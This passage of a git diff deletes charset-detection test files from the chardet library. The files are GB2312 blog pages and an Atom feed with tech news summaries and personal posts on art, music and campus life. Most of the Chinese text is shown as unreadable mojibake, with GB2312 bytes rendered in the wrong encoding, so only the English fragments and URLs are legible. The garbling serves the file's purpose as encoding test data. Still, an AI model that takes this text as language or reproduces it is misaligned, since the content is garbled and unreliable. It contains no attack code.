ֻֻׁקׂ‎ַז׃×ֿת׀³¡ֹֿµִµֽ¶ֻׂ»·½¡£¡±ֻֻµ¡£ ¡¡¡¡־¢ָםװֶהAdCenter£¬׃כGoogle AdWordsֿא¾÷ױשµִ¹״¼׳ײ¹ד¸ז»מ¶¯¹₪¾ײ׀ׂ²¼׃ָכֱֻֽרֲח·ײ־צ¹¦ִ¡£ִ¿ַ°AdCenterױ‎װ׀ֲ¼׃ֲֶ÷ֽ·¨¹ת½ר׀׀²גװ£¬ֻש²»ֽ¬µִַױג¿מ¹₪¾ּב¹©׃׀¹״׃¹ד¸זִ¿±ך׃ֳ»§µִױכ¶װ׀װ׀ֵֿ¢£¬ָח·ֳ־׃ֳ»§µִִךֱה¡¢׀װ±נ¡¢ֻשװµ״ַרµִ׃±אµָ¡£... - - - Google AdSense "ֶֽ½י²תֶ·" - http://www.coverer.com/archives/000829.shtml - Google AdSense ֶֽ³צ׀ֲµִ·¢²¼ִֹּ£½ "ֶֽ½י²תֶ·" ְ׃ֳGoogle AdSense׀ֲµִֶֽ½י¹¦ִ£¬ִת¿ֹׂװװװצ¼׃ױָכµִֽ¬±װצ¼׃׃ֳ»§¶װµ׃ֳ²תֶ·÷ֽ·‏־סµֱִֻ½ג¡£װֽרױ¾ֹּֿם¼׃ׂ»¸צֶֽ½י°´ֵ¥£¬ִת¿ֹׂװׂ‎µ¼׃ֳ»§׳¢²ב AdSense£¬ַׂ»סְ׃´ֻֽרױ¾ִָ¡£ µ±׃ֳ»§µֳµ½µִ²תֶ·׀ֵֿ¢װ½¶א£¬ִת½«»סְװ½¶א - ֳ¿ׂ»־»׀ֲ׳¢²בµִ·¢²¼ֹּ»סµֳ $100 µִױׂז±£¬־ֳַׂ±ד»בֿעִתײ§¸¶ US$100¡£ ־ׁׂׂ¾­³¢װֽ¶·ֱֵֻ....... - - - How Much Is My Blog Worth?¿´¿´ִדµִBLOGײµ¶אַֹ® - http://www.coverer.com/archives/000828.shtml - How Much Is My Blog Worth? Inspired by Tristan Louis's research into the value of each link to Weblogs Inc, I've created this little applet using Technorati's API which computes and displays your blog's worth using the same link to... - - - Yahoo! Publisher Network, Yahooּפױ½Google AdSense - http://www.coverer.com/archives/000827.shtml - Yahoo! ·¢²¼ֱֻׂ»ֿמְאֶֻ׃Google Adsenseµִ¹ד¸ז·‏־ס£÷Yahoo! Publisher Network¡£ Yahoo! is expanding its distribution network to include you. Based on demand from online publishers, we are opening our Publisher Network to the broader publisher community. Through the expanded platform, we plan to offer unique... - - - Googleֿא¹״µִ׃עֳ´ףָ« - http://www.coverer.com/archives/000826.shtml - ָױַ°£¬¹תֽגֿֿ¢ױ¾µדֽ¸ֲ¶ֱֻGoogleֻש׃׀׳¢²בµִ׃עֳֳµ¥£¬ױג¸צֳµ¥¼ַװ״ֱֻ¶א´ן400¶א¸צ׃עֳֽרײ·¡£ֶהײ׀ׂ»׀©ֽרײ·ַ־ֳַׂױ‎װ¹׃ֳµִGoogle¹¦ִֽרױ¾µ״ײ·¡£ ׃עֳֽרײ·µִ´ף¶א‎¶¼ֹז¼° Google µִײקױ¾ֳ÷ֽׁׂ¾­·¢²¼µִ²תֶ·£¬ְ‎ָח£÷Google.com¡¢ Google.net¡¢ Google.org¡¢Adwords.netµָ¡£ ׃׀ׂ»׀©ֽרײ·ֶֻ÷ץַ·ְ׃שµצ׃דֽרױ¾£¬·ְײ¹¶װ·½ֶֶ­׃ֳ»§ײ״׀ֲµ¼ֿע£¬ְ‎ָח£÷Froogel.com¡£ ׃׀ׂ»׀©ֽרײ·׃כֹ«ַי׃׀¹״£¬µ«»בַ£³¶Google£¬°»µGoogle׀־ֿף£¬ְ‎ָח£÷porngoogle.com¡¢googleporn.com ¡¢googlesex.comµָ¡£ »¹׃׀ׂ»׀©£¬ָ´¿ִֹ׃כGoogleµִ־´ְ´·¢ױ¹׃׀¹״£¬ְ‎ָח£÷gbrowser.com£¨ה¯ְְֶק£©¡¢googlewifi.com£¨WIFI£¬¹‏¹‏£¬ַ°²»¾ֳ־ֳַׂ¶¼ּ‎ֻµֱֻgoogleױג·½ֳזµִ׀ֵֿ¢£©¡¢gcalendar.com£¨ָױְת£©¡¢gchat.com£¨ִׁµְ³‎ֱֻGoogle Talk£¬ֳַֻ»¹׃׀±נµֱִִּלֿכ·¨£¿£©¡¢googlebuy.com£¨װֿ¹÷־ן£©googlemusic.com£¨װֿֿׂפְײ£©¡£ ׃׀ָ₪µֳַ£¬Google »¹׃µ׃׀googlesucks.com µִֽרײ·¡£־¢ָםװר¾­±»µ׀ׂג׃ֳ»§׳¢²ב¹‎ׂ»¸צ¡°windows-sucks¡± µִµ״ײ·£¬¿´ְ´Googleׂ²²»ֿכֳ¿ּל¶װ׳ֵױגֳ´ׂ»¸צ¶ס׀ִ׳װ¼÷µִױ¾µד£¬ֳָ׳װ¼÷²»¸׀ֻ£¬²»ָח׳װ¼÷ֲעְֲֿ´£¬÷ֳ¹‎±»±נָֻ׃ְֳ´װ׳װ¼÷ֽ·ְֹֿ­÷¡£ ױגְן»¹׃׀ׂ»¸צ´¿‎׳ײµִֽרײ·466453.com¡£400¶א׃עֳײ׀£¬Googleµ¥µ¥ּפׁ¡ֱֻױגֳ´ׂ»¸צ‎׳ײ׃עֳ£¬²»ײ×µְַ־ֱִ»¹ַ±נ׃׀ֶףֽ¼£¿׀¡׃¹ֻֻׁקֱֻׂ»ֲֿ²ֵױׂµ½´נ°¸¡° Googleּב¹©‎׳ײ»¯µִ²יׁ¯£¬¼´׃ֳ‎׳ײ´תּז׳ײִ¸£»׃ֹ׃ײ»תֹֿ¼־»±ָ½ֹֿ£¬ְ‎ָחׂ×הָכGoogleַ£¬°´ֲֿµִֶהµַ466453¼¸¸צ¼£¬ׂע´ֻ¾ֽ׃ֳ466453ְ´´תּזGoogleױג¸צµ¥´½ר׀׀²יׁ¯¡£¡±¿´ְ´google¾ַֽgoogle£¬²»·‏²»׀׀¡£... - - - PHP´תֲכ·´±אׂכָם¼‏³צֲ¯ zendׁׂ¾­¿ֹׂװ±»ֶֶ½ג - http://www.coverer.com/archives/000825.shtml - 10װֲ4ָױ£¬¹תִ׃׀ׂ»¼ֳׂ־×ַו·ח¹₪׳קׂµִֽרױ¾ֶֽ³צׂ»¿מֳ־×deZenderµִָם¼‏£¬¾ֳַֻֻµ¡°deZender¿ֹׂװ·´±אׂכ±»zend±אׂכ¹‎µִֻש׃׀PHP´תֲכ£¬׃ֹdeZender²תֹתµִPHPװ´´תֲכֽ¬װ­¼־ִ¼‏ֿא±ָ£¬װװ´´תֲכ¼¶׃׀³¬¹‎95%ׂװֹֿµִׂ»ײֲֲ£¬³‎¼«ֹ‎ּ״גַי¿צֽג£¬־׀ט¾­¹‎ָ־÷־׀¸ִ£¬¼´ִױ‎ָ·װֻ׀׀²¢µֿײ׃כװ­¼־ִ¼‏ֽךָ«ֿאֽ¬µִ¹¦ִ¡£deZenderִ100%µ״»¹װ­PHPµִ±הֱ¿ֳ¡¢÷¯‎ֳ¡¢ְאֳ¡¢פ׀װֳ¡¢·½·¨ֳ£¬ֹץײֱ÷¯‎µִ²־‎ֳ¡£¡± ױג¸צֿֿ¢ׂ‎ֶנֱֻײ¶אphp°®÷ֳױµִ¹״׳¢...... - - -
    -
    \ No newline at end of file diff --git a/chardet/tests/GB2312/eighthday.blogspot.com.xml b/chardet/tests/GB2312/eighthday.blogspot.com.xml deleted file mode 100644 index 540a215..0000000 --- a/chardet/tests/GB2312/eighthday.blogspot.com.xml +++ /dev/null @@ -1,158 +0,0 @@ - - - - - - -Live for the moment... - - -tag:blogger.com,1999:blog-8009332 -2005-11-30T00:56:52Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -eighthday - -2005-11-29T19:55:00-05:00 -2005-11-30T00:56:52Z -2005-11-30T00:56:52Z - -tag:blogger.com,1999:blog-8009332.post-113331221246072185 -׃ײµֱֻ - -
    welcome to my new blog~~~
    -
    -false -
    - - - -eighthday - -2005-11-10T19:37:00-05:00 -2005-11-11T00:38:26Z -2005-11-11T00:38:26Z - -tag:blogger.com,1999:blog-8009332.post-113166950601740754 -ֳ־׀ׁ±·ײ - -
    ־ֿׂכ־ׂ׳מ÷ֳ»¹ַ±נװ·¢ׂױץ·PhDµִ´÷ַן´ףֳ־ֱֻ£¬°²׀ִ»­־ׂµִ»­±ָ²ֳ´¶¼÷ֳ¡£±¾¿ֶׂױץ·¿־ׁׂ¾­׳דׂװֳָ־ׂ¾«ֹס·ײֱֱֻׁ¡£
    -
    ¾ּוֻµֻµ־ֱֻׂ²ֳ´´ּ¼₪£÷־ֽׂ»ָ»ׂג¶µ½ױגׁשׂ»¸צֲµ£¬¼´ֻהָ»־ָָׂ°®»­»­£¬ ¿ַֹ־ׂ²»¸׀ֳ°µִ»­¼ׂװ¶±ָ־ָָׂ°®µִ»­¼ׂ¶א£» ¾ֽ÷ֳ±ָֻהָ»־ֿׂ²»¶־ִׁ§£¬¿ַֹ־ׂ²»ֿ²»¶µִ׳ק¼ׂ׃ְװ¶±ָ־ֿׂ²»¶µִ׳ק¼ׂ¶א¡£ױג¾ֽׂג־¶׳ֵ´ף²¿·ײ±¼ה־ׂ¶¼װׁ§ֿ°ׂ»׀©־ׂcouldn¡¯t care lessµִ»­÷ֽ»­¼ׂ¡£־ׂ¼ַ²»׳¡ָֹ׀׳קֶ·µֳִ³ֶ±¼הµ״µד÷ֽ³´ח£¬ׂע־×ֳַֻ¶װ׃־ְׂ´ֻµײ»ַׂ»·ש׃ײׂ»·ש¾³ףµִ»­£»־ׂׂ²¼ַ²»׳¡ִ×ִ־µִ׳קֶ·£¬ֳַֻ׃־ׂײ»ֱַ¬ֳא²»¾רµִ־ֱִ·ח¾°¡£¿ַֹ־ׂ¶װ־ׂ׀ִַׂµִ»­¼ֳַַָׂח´ֻµִָָ°®£¬ׂװײֱ׃װְֿ¦¿־ִָ÷ֳַֻֽ׃׀¹״µִָױ׳׃ְן־ׂ»ב׀ִ³±ֵלֵָ£¬װֶהֻµִָױ׳׃ְן־ׂ»ב´ע¹‏ַ·´עµֳָש°ן׳׃ֻב£¬־ׂ»בׂע־×ֳַֻװ800ׂ³µִ¿־±¾ְןײ»ױ¼ֱ½ׂ³¶ר··²»ֶ½£¬ׂ²»בװ¿´µ½ֵתְֳֶַֻµִׁװֲ±ֶרµֳֻ«ײ·¢²¡£¶רַׂׂ»²¿ֿײ´תׂױץ·£¬²»¿ֹ±ֳגµ״ַײֶָֻ׳ל°ֹֻא÷ףֹ‎·‏´׃¶אֻµµִ½ב¹£¬¼´ֻש־½ײקֱקָ¨ֽ‏¡£ֿס־ׂױגײײ׃׀·‏´׃ָ¨ֽ‏¹¦ִױֿ°­µִ׀¡´ּֽ·ַ²»¿ִֶֹ¨°₪׳ֵµ״׀י׀ִׁ§ֿ°µִ¡£±ָָח־ׂ¾­³£ׂ»±¿´ײ¸¶¨װִ¶ֱ²ֱִֿ£¬ׂ»±װ׀ְִן÷ֽ׳קױ¶װ»°£÷¡°I absolutely disagree¡±, ¡°how dare you¡±, or¡°are you tripping£¿¡±
    -
    ²»ִֿׁכֿף£¬ױג׀©ַי׀ק²¨¶¯ֿׁײ״½µµֱֻֽ־ׂµִׁ§ֿ°׀§ֲ¡£±ָָח£¬½סּל¿´ֲםµֻ¹µִׂױץ׀ׁװ£¬ֻֻµ»­¼ׂ¾ֽײ»׃¦¸ֳ»­upliftingµִ»­¡£µ±±־ׂ¾ֵֽ­ֱֻ¡£ױג²»¾ִַֽ³־»ְֿײק±א׃ןײ״׀ִ³₪µ״¸זֻֽץ׀¡²¨µִ»°ֲנ£¿upliftingµִ»­ֳ»²ֳ´²»÷ֳ£¬׃׀µִ־ׂׂ²ֽ¦ֿ²»¶£¬µ«ֻװץֳ´¾ֽ²»ֳק°׳£¬ָֻ׳׃׀depressµִ±÷ע¡£ֳָdepressµִָֻ¿´ׂ»ֵֹ»¶ְײ÷ֶֽ½׀ְ׀ְֿעָµִ¾°ֿףײ»ִ¸ֳֳַָֻ¾ץ׳ֵױג¸צְ½ח׀י־±£¬¾ץµֳ±»¹ֱֲ¢£¬ײ»ִ¸ֳֳַָֻ¾רֽ¡£¶רײ»׃׀Munchִַ׀©¡°depressing¡±µִ»­²ֳֳִֵַָֻׂג¶µ½׳װ¼÷²¢²»¹ֲ¶ְ£¬ֳֳַָֻ¾ץµֳ׃׀ְָֻם½גֳַֻµִֽ´¿א£¬µֳµ½°²־¿¡£װֻµֱֻ£¬ ²ֳ´ׁשµִ»­²ֵ½׀uplifting£¿ ֻ­ֻµֱֻֻד£¿ױג±¾ֹם¾ַֽ·ַ³£ײק¹µֲִַי¡£ֶ¾²ֳ´°ׁ׳ְ׳׃»­µ½ַ½ײ½ְן£¬°ֲׁדֵ®»­³ִֹ¾µס׳´¾ַֽuplifting? ֲםµֻ¹·ַ³£³ח°µִָֹ׀£¬ֻµִµ״ױנ׀¡ֹ½ַנ÷ְֳֶֽ»¹ֳַ׃ײ׃׀²ֳ´upliftingײ®´¦£¿ְֲֿם»¹ֻµ¡°the thought is worth no more than its expression by the means¡±¡£־ֲֿׂ°ֽע₪¶¼µפµ״ֱֹֻֿ£¬ױג»°µֳ·´¹‎ְ´ֻµ»¹²מ²»¶א¡£
    -
    µֳ£¬ׂ×־ּׂלּל¿¼¾¿ױג׀©÷‎ֽ¿ִ׀µִֹת»מֻצֲ£¬»¹ׂ×׀´paper¸רֳַֻ¸ט¹¦ֻּµֲ£¬±¾¹ֳִן¼ב¾צ²»´נ׃¦~~
    -
    -false -
    - - - -eighthday - -2005-10-28T00:18:00-04:00 -2005-11-04T02:28:23Z -2005-10-28T04:20:19Z - -tag:blogger.com,1999:blog-8009332.post-113047321971568977 -׃׀¹״־ׂµִׁ§ֹתײ₪ - -
    ַ°ֱ½ּל°ׁׁ§ֹתײ₪ֵ×¶×ֱֻ£¬½סּלָ¥²¹°לׂ»¸צ£¬ֻ³´רׂ×ַףײ״ױױׂ»ױֵׁ§ֹתײ₪ױױֶ¬¡£ ׁ°ֻ¼׳ִֵ±ָׂװַ°ִַױֵ»¹¿ײ²ְ¼¸÷ץֱַד¸ֲֲֵ¼‏¡£ ׁ§׀£°לײ₪´¦µִֹדֿסֽ·װ°ל¹«ׂׂ»½ַ£¬¼׀װ¸´׃¡»ת׃כְ¬»רֽ°ײ®¼ה¡£ ּשַ½·ֵ׳ֵׂ»°ׁׂ־׳׃¡£ ֽ׳ֵׂ־±³ַ½ֽ·ֹֿ´ף¿י´ף¿י²»¹זװעµִׂץ׃°£¬־ׂµִ׀ִ¿©אגׂ»³ֱ¡£ ¹²»ֶהָ»£¬׀ֲױױֶ¬ׂ»³צֿײװµחִװֱִֶ»ֹֿ£¬־ׂ²מµד¶שֳ»÷°³צׂ»ֹש¡°¾ֳָ¡±ְ´¡£ ָח¹ֻµ¼ַׂהְןֵׂ§µִׁ§ֹתײ₪ֹֿµִִַױֱֵ³ֿסַ±»¹ׂװײיְֲֲִך·וֹֿ±©ֹ¹ֱָֻ‎¸צװֲ׃ײ·ֵ½ר־¢²¨ֲ¯ְן¿¾ֱֱֻ½·ײײ׃£¬׀ֲױױֶ¬ְןµִױגױֱֵ³װעֿסַ±»¶־ן·´¸´׳²»ק÷ף׃ײ·ֵװ¸£¶ֲםֱײְןֱֵֻׂ»ִך£¬ֳָ־ׂµװ־´׃±ז±נµ½µ׳ִִױֱֵ³¸־×÷§ָֻ¡£ ¸ׂ×ֳµִַ£¬ָח´ֻ±¥¾­²׳ֹ£µִׂ»ױֱֵ³£¬¾׃ָ»»¹װׂ»ָח¼ָֽשµ״¡¢־װ¹־»µ״־¢׀¦£¡ ױג¿אִׁµִ־¢׀¦ְןױֹה³צµִָֻ׀װµִ¹ג»װֳָ־ׂ³¹µ׳³ֱִחװ׀ֱֻבײ׀²»ִ׳װ°־£¬²מµדָקְבµ±³¡¡£ ¾ֽװױג¸צ±¿ּ£¬¸ר־ׂױױֿאµִ¹₪׳קָֻװ±ׂ»¾ה»°°ׁ־ׂ´׃׀ֱֻבײ׀ְ­ֱֻ³צְ´¡£ ֻֻµ£÷¡°Ah~ a nice one!¡± ´ֻ±´ֻ¿ּ־ׂײ±ֿכױׂ¸צַ¿ֱ¦־³¾ֶק°ׁױג״ֻ¸ר־½רָ¥£¡
    -
    -
    ²¹¼ַ£÷ Just when I thought this couldn't get any worse -- ִ³־»»מְ׳·זױׂµ½ֱֻ־ֵׂׂ§µִׁ§ֹתײ₪²¢½«ֶה½»¸רֱֻ±£°²וו¡£ ׃ַ£¬׀ֶַׂ»־ׂ׳½ר½ּׁ§ֲ¥µִ±÷ע£¬÷ױָ»·¢ֿײ־ׂµֳִַױֵֿסַ±»¹ׂװײיְֲֲִך·וֹֿ±©ֹ¹ֱָֻ‎¸צװֲ׃ײ·ֵ½ר־¢²¨ֲ¯ְן¿¾ֱֱֻ½·ײײ׃µִׁ§ֹתײ₪ױױֶ¬µִ¸´׃¡¼‏±»ֱ¬ֳ´ר׀ױµ״ּשװֱֻ¸ק¸צײקׂ×½»ֽ¨ׂ×µְ÷ֽµחֳֵֹּֿ¡£ ׃ֹ׃ױגֳ´ׂ»¸´׃¡£¬ֳֹֿזµִױױֶ¬ֿײװַ¡£¡£¡£¡£ ·´ױ‎ֿײװ־ׂװ¿´־ׂµִָ־÷־ׂ»ױֵׁ§ֹתײ₪¶¼¾ץµֳ -- not bad, not bad¡£¡£¡£
    -
    -false -
    - - - -eighthday - -2005-10-11T16:20:00-04:00 -2005-10-12T04:22:13Z -2005-10-11T20:21:57Z - -tag:blogger.com,1999:blog-8009332.post-112906211745608460 -I'm On Train - -
    In his book Slowness, Kundera gives this ingenious dissection of our obsession with speed:
    -
    -¡­the man hunched over his motorcycle can focus only on the present instant of his flight; he is caught in a fragment of time cut off from both the past and the future; he is wrenched from the continuity of time; he is outside time; in other words, he is in a state of ecstasy; in that state he is unaware of his age, his wife, his children, his worries¡­As opposed to a motorcyclist, the runner is always present in his body, forever required to think about his blisters, his age, more conscious than ever of himself and of his time of life. This all changes when man delegates the faculty of speed to a machine: from then on, his own body is outside the process, and he gives over to a speed that is noncorporeal, nonmaterial, pure speed, speed itself, ecstasy speed. -
    -
    Memory and consciousness are precious; they give you the context, the dimensions, the latitude and the longitude to reflect on everything you experiences. The unreflected life is not worth living, says Socrates. But when you flip the coin, get rid of all you memory and self-consciousness, will you arrive in hell? On the contrary, you get Kundera¡¯s ecstasy of speed. Actually, I¡¯d rather call it the ecstasy of escape. When you think about it, speed, ski, movies, alcohol, drug, orgasm, rock n¡¯ roll, all these hobbies and obsessions that make you high, all they really do is send you away. They drag you out of you everyday life, set you free from your body and its desires, and push your soul to drift. It¡¯s like riding the train: you are traveling from point A to point B without giving an effort, without a direct purpose or a destination. You can stick your head out of the window like a dog, you can inhale the wind, and say hello to the passing by electric poles, trees, cows, stars, mountains, rivers, and tunnels¡­You don¡¯t want to arrive anywhere, and you wish the train goes on forever. In fact, if I were the guy in Groundhog Day, I would just take a train ride every day. Life can be kind of wonderful. In this sense, death is not so scary and different after all.
    -
    So what is all this about? It¡¯s about music. Hehe, slack and fainthearted as I often am, I found music my favorite way to escape. Certain combinations of rhythm and melody send me directly on train. Like Van Hunt¡¯s Dust, Remy Shand¡¯s Rocksteady, and Movin Gaye¡¯s Where are we going. They all have the magic to tune me into ecstasy for about 4 minutes. The train never arrives as long as the music goes on, and on, and on¡­¡­¡­¡±I am dust blown away over the edge¡­¡±
    -
    -false -
    - - - -eighthday - -2005-08-27T01:03:00-04:00 -2005-08-27T05:05:19Z -2005-08-27T05:04:13Z - -tag:blogger.com,1999:blog-8009332.post-112511905331333127 -³פְֳ·»° - -
    ְְֳצױג¸צ¶«־ק°¡£¬ֻµְ´»°³₪¡£ֻ׳מ³ץׂ²׀םַ׳ק־×ׂ»ײײ׳װָ»׳װ´´זװ׳ֵµִ£¬µ«ַ½סּלׁׂ¾­ׁ±ה³ֱֹֻׂ»¸צֹּֽׂ»ַ׀µִ÷¶´¡£
    -
    ׳מװחµִ±÷ע¿ִַֹױגׁשµִ£÷³צ׃ײײ׳וׁ׃׀רµִ׀טׂ×£¬־×ּב¸׃׳װ³µִ³ֹ»מֲ£¬¹«װ³׃¦¸ֳׁ°ױׂ½¡¿µµִִ¸װ³½»ֵה£¬ִ¸װ³׃¦¸ֳׁ°ױׂ»ב´עֱװµִ¹«װ³½»ֵה¡£»ב²»»ב´עֱװ÷÷ֳ¼ר¶¨£¬±ָׂ»±ָֻ­ֽֽµִָג׳מ¶א¾ֽ׀׀ֱֻ¡£ִ¸װ³½¡¿µ׃כ·סָ´׀טׂ×ׂ»¶¨µִײ×¶ְ´¼ר±נ¡£ֿכֲֿׂ»´ת²»ָ±¸ל²²ָֹֽ£¬ׂ×ױּׂו¸סװָ³ֶµִִ¸װ³£»ֿכֲֿׂ»´תְׁ¿÷ֳ²»׀±ׁ²»¶·¼¦²»ֳֽ´½£¬ׂ×ױֳׂקםרנ©³־ו¹¶ֻױ‎µִִ¸װ³£»ֿכֲֿׂ»´ת²»ֽ·¶¥ֹת´¯½ֵµ׳ֱקֵ§£¬ׂ×ױֶׂ₪·פ¹ג»¬µִִ¸װ³£»ֿכֲֿׂ»´תֶרׁ׳ה׳דׂ×ױׂ׳ל´½÷לָףֳ«·¢׃ֱֱֽµִִ¸װ³£»ֿכֹת²ת¹‎³ֻּ³ְׂ×ױׂ·הׁ·ֽ־µִִ¸װ³¡­..¹«װ³ֳַ¿¹ׂיֻµױגׂ»ַ׀¶¼ּ«¸´װ׃ֱֻ£¬־ׂ»מױגֳ´´ף°ִׁך¼ֽ²ֵ¸דֳק°׳ױג׀©µְְם£¬ׁׂ¾­ּ«ֽםֱֻ£¬־ֳַׂ׃¦¸ֳ¿×ֹטׁ§ֿ°׀¡׳י£¬¹ד·÷½»ֱק¾­ׁי£¬°לׂ»׀©±¨¿¯װ׃ײ¾£¬°ׁױג׀©ײ×¶ׂ»´תׂ»´ת´«ֲָֿ¥£¬׳מ÷ֳִׂװ÷ףִ±ה³ֹ־ֳַׂ׀¡¹«װ³µִ±¾ִ¡¢ײ±¾ץ¡¢ּץ¼‏·´ֹה£¬ֳֳַָֻׂ»¼µ½ּו¸סװָ³ֶ¡¢ֳקםרנ©³¡¢־ו¹¶ֻױ‎¡¢ֶ₪·פ¹ג»¬¡¢׳ל´½÷לָף¡¢ֳ«·¢׃ֱֱֽ¡¢·הׁ·ֽ־µִִ¸װ³¾ֽ׀ִּר¼׃ֱֻ½ׁ·ֵ¹ג¡­¡­¼¸°ֽעִךׂװ÷ף£¬ױג¸צֳ־ֿכµֿײֱֻ£¬¹«װ³ֳַµִ»שׂעׁׂ¾­½ר»¯µ½ֱֻױגׁשׂ»¸צµ״²½£÷¼´ׂ»¼µ½·÷ֿׂװֹּֿ״ױקµִִ¸װ³£¬´ףִװ¾ֽ»בֽ·ֵׂ»ײײ·׃£¬ֳָ¹«װ³highµֳִֻײ«³י´₪¿½ֱַקֿׁ£¬א«א«׳ֵ¡°ְֳֵ®°¡¡±£¬¿¸ֶנ³תֽ·¾ָֽ¥ֽ´ףֹ½¶´£¬°ֽֽׁµִָג¶¼·מֿ׳³צְ´¡£
    -
    ײלֳֵ¾ֶָג³פ°¡£¡ׂ»¸צ´ֳֿקµִִ¸װ³ֶר²»¹‎£¬׀ִֹתׂ»¼ֶ£¬׳¥ֱֻ¿י¯ֽ·ִ¥³ֹ·£¬²ֱװֱ³ֹֿ£¬ױ×ֱֻ¿ֵ׃£ּׂ¼·³צײ­£¬ֽ¿װ׳ל´½ֹֿ£¬¹«װ³ֳַׂ»¿´£¬÷פ£÷¡°ָֽ£¬־ׂ´׃ְ´ֳ»¼¹‎ֶ₪·פױגֳ´÷ֳ£¬׳ל´½ױגֳ´÷לµִִ¸װ³ִֵ£¡־ײֳ´־ׂµִ׀ִּרµֳ÷ֳ¿לא£¿־ײֳ´־ׂ׃׀ׂ»ײײ׀´«µִ³ו¶¯א£¿¡± ֶהִֻ¸װ³ׂ»¿´£¬ױג»¹ֱֻµֳ£¡׀י׀ִׁ§ֿ°ײ®£¬׃ֲ¸ׂµ¼שײ®¡­¡­ׂ»±¼ה׀ם¶א¿ֹ¸ט¿ֶֹµִ°®ַי¹ֲ°יֻז׳ֵײײײײ³פְֳ¼¼ץ´´׀ֲ·׳·׳׃¿ֿײ£¬¿°³ְֶָֻאְת·ֹֿµׂ»´־־ִׂױ¸´׀ֻ¡£´׃´ֻ£¬ְְֳצױג¸צ¶«־ק¾ֽ²»װַ׳װָ»׳װ´ֱֻ¡£
    -
    ½׃ְֲֿ´µִׂ»¶־±¼הְן£¬¹«װ³ֳַ׃׀µדֹףְֳֶ£ְֱֻֽ¡£׀כײ×װױג¸צֽע±הְ½חְן£¬ֱװֶז¡¢ּ½ֻקµֱִִ¦¶װ־ֳַׂײײ׳וµִ´זֽצײֱ¹״ײ״ׂס£׃ַױגֳ´¶אִךְ´ֿ²׀ֲׁב¾ֹׂ²ׁׂ¾­½ר»¯³ֱֱֹֻװײֳַµִ»שׂע£¬׀ֲֲ־ן»בַ¿ֱׂµ״´ּ¼₪¹«װ³ֳַµִ´ףִװ¡£׃׀ׂ»¸צֹמֿ´ֻµְµִ׀ֱִיײַֹµִִ¸װ³ױ×ֱֻ¶ה÷ל»¨²וװֽ·ֹֿ£¬´©ֱֻׂ»´®±´¿ַ¹ׂװ²±׳׃ֹֿ¡£¹«װ³ֳַׂ»¿´£÷¡°ָֽ£¡ּ«exoticֱֻ£¡ ֹסֳ״ׂ®ְַׁ£¬־ׂׂ×ּ½ֻקִד~~~¡± ´׃´ֻ£¬ְְֳצױג¸צ¶«־ק±ה³ֱֹֻׂ»ײײ׀ְִםֱ¦ֱ¿, ׂ»ַ׀¿ֹׂװ¼₪ֶנ¹«װ³ֱװֶז׀ְִםµִµְ¾¶¼¿ֹׂװ¹ִ¸װ³¸hot¡£
    -
    ¶ר´קױג¸צµְ¾µ½µ׳ְֳ²»ְֳ£¬ֳ»ָֻֻµµֳַו³‏¡£װױג¸צׂיּגֹֿ£¬ׂ»¿×¼ִַ¸װ³·‏´׃¹«װ³£¬ֹ‎·‏´׃¶א‎¡£¹«װ³ֳַ׃ֳֳַֻֽֽµִָג/»ץ±ְׂ´ֽ¶ֶ±£¬׳מ¹ףµִµְ¾¾ַֽ׳מְֳµִ׳מ±קײµִµְ¾¡£¶רִ¸װ³¿×¼·¢ֿײ£¬ֵו´קױג׀©׳מ±קײµִµְ¾²»½צִ׃×װלׂ»ײײexoticµִ·חַי£¬¸ײ״ׂ×µִַ£¬ִֻ±ךײ¾׳ֵֵו´קֻµִִ¸װ³׳·ַףױײ£¬´ף¼ׂ¶¼ֿכׂ×µִ¶«־קׂ»¶¨ַ÷ֳ¶«־ק£¬´׃¶רִ־ׂ‎¸¶אַ±װ׳·ַףױ£»¶רׁׂ¾­׃׀ֵהֵ¼µִִ¸װ³ֵו´קױג׀©°÷¹ףµִµְ¾¿ֹׂװּוֿײ׳װ¼÷¶װֵהֵ¼µִ־ׂ‎ֱ¦£¬ׂ»·½ֳזַׂ»ײײ׳װ־ׂ׀ְִם°²־¿£¬ֱםׂ»·½ֳזׂ²ִ¶װ´ְ´ְ׃¶¯ֵֻ»ת׀׀ַװµִµ¥ֹםִ¸װ³ֶנµ½׀©׀םױנֹו׳ק׃ֳ¡£
    -
    ׃ֱַֻ½גµ½±קײµִ¶אײ״׳ק׃ֳµִִ¸װ³ֳַ¾ֽ¿×¼׳ֹֿׂ»ּץ²»¹יֲ·£¬»טּל÷µ״µ״¸ֿ±קײֱֻ¡£׃׀µִ·ַײִ¸װ³¿×¼װֳ¼ֳ«ֳֹֿז´ֱ¼¸¸צ¶´´©¹ַֽ·£¬װ׳ל´½ֹֿװה¸צ´ף¶´´©ִ¾ֽ·£»׃׀µִּ©¹תִ¸װ³¿×¼²»¶ֿµ״װ²±׳׃ֹּֿ׳ֽ­ָ¦£¬¾ֻµ²±׳׃װ½³₪¼µֳװ½÷ֳ£»׃׀µִָױ±¾ִ¸װ³װ¶ַ׳׃ְןׁר»׳³זׂװֲֲֶֹֽֿֿ׀÷¡£ֲַי·¢ױ¹µ½ױג¸צµ״²½ׁׂ¾­÷ֽײײ׳וׁ׃׀רֳ»׃׀ָ־÷־¹״ֿµֱֻ¡£
    -
